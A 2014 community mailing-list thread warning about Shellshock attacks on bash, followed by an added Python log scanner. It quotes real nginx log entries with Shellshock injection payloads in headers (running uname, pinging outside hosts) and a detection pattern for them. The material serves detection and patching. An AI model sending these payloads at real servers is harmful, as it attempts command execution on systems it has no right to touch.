[vpsFree.cz: community-list] Attacks on bash are under way

Jiří Medvěd admin at jirimedved.cz
Mon Sep 29 09:54:49 CEST 2014


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Hi Petr,
thanks.

So far I have found only this :)

/var/log/nginx/access.log:54.251.83.67 - - [29/Sep/2014:07:26:24
+0200] "GET / HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -c \x22echo
testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log-20140925.gz:209.126.230.72 - -
[24/Sep/2014:23:47:52 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping
- -c 11 216.75.60.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log-20140926.gz:209.126.230.72 - -
[25/Sep/2014:03:52:42 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping
- -c 11 209.126.230.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log-20140926.gz:89.207.135.125 - -
[25/Sep/2014:14:38:39 +0200] "GET /cgi-sys/defaultwebpage.cgi
HTTP/1.0" 404 162 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
/var/log/nginx/access.log-20140926.gz:198.20.69.74 - -
[26/Sep/2014:01:47:24 +0200] "GET / HTTP/1.1" 200 612 "() { :; };
/bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"

On 29.9.2014 at 09:41, Petr Krcmar wrote:
> Hi, I just wanted to warn that attacks on bash are in full
> swing; according to the log, yesterday someone tried to upload a
> rootkit to my server and run it. So be vigilant and patch it.
> 
> If you want to see those entries in the log, grep for them:
> 
> # grep '() {' /var/log/nginx/*
> 
> If you have logrotate and gzipped logs, use zgrep.
> 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iF4EAREIAAYFAlQpEEkACgkQ5JdzTS3AJTbe4QEAhKZrmMvrkOH4gQZDk5TNbJ5+
zGVw+Zxp5lhx1Y8mBtkBAJBBjVlGvdLEQhFF5RDF3O4aAAgjeN1IOqfNXrBNzB45
=BEHd
-----END PGP SIGNATURE-----
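
The grep from the quoted message, extended as an added example (not part of either e-mail): it parses nginx access-log lines, reports which field carried the "() {" prefix, and reads gzip-rotated files the way zgrep does. The function names and the sample lines are constructed for illustration, and nginx's default "combined" log format is assumed.

```python
import gzip
import re
from pathlib import Path

# nginx "combined" format:
#   ip - user [time] "request" status bytes "referer" "user-agent"
# nginx writes a literal double quote as \x22, so quoted fields hold no raw ".
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# The function-definition prefix "() {", with optional whitespace, as in the
# variants logged above.
FUNC_PREFIX = re.compile(r'\(\)\s*\{')


def scan_line(line):
    """Return (ip, time, status, [fields carrying the prefix]) or None."""
    m = COMBINED.match(line)
    if not m:
        # Line is not in combined format: fall back to plain grep behaviour.
        return ("?", "?", "?", ["raw"]) if FUNC_PREFIX.search(line) else None
    hits = [f for f in ("request", "referer", "agent")
            if FUNC_PREFIX.search(m[f])]
    return (m["ip"], m["time"], m["status"], hits) if hits else None


def scan_file(path):
    """Scan a plain or gzip-compressed (logrotate) access log."""
    path = Path(path)
    opener = gzip.open if path.suffix == ".gz" else open
    with opener(path, "rt", encoding="utf-8", errors="replace") as fh:
        return [hit for hit in map(scan_line, fh) if hit]


# Constructed sample lines (documentation IP ranges), not from a real log.
SAMPLE = [
    '192.0.2.10 - - [29/Sep/2014:07:26:24 +0200] "GET / HTTP/1.1" 200 612 '
    '"-" "() { :;}; /bin/ping -c 1 198.51.100.7"',
    '192.0.2.11 - - [29/Sep/2014:07:27:01 +0200] "GET / HTTP/1.0" 200 612 '
    '"() { :; }; /bin/ping -c 1 198.51.100.7" "Mozilla/5.0"',
    '192.0.2.12 - - [29/Sep/2014:07:28:15 +0200] "GET /index.html HTTP/1.1" '
    '200 612 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(scan_line(line))
```

A hit shows that the request reached the web server with the prefix in that header; it does not by itself show that bash ever processed the value.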


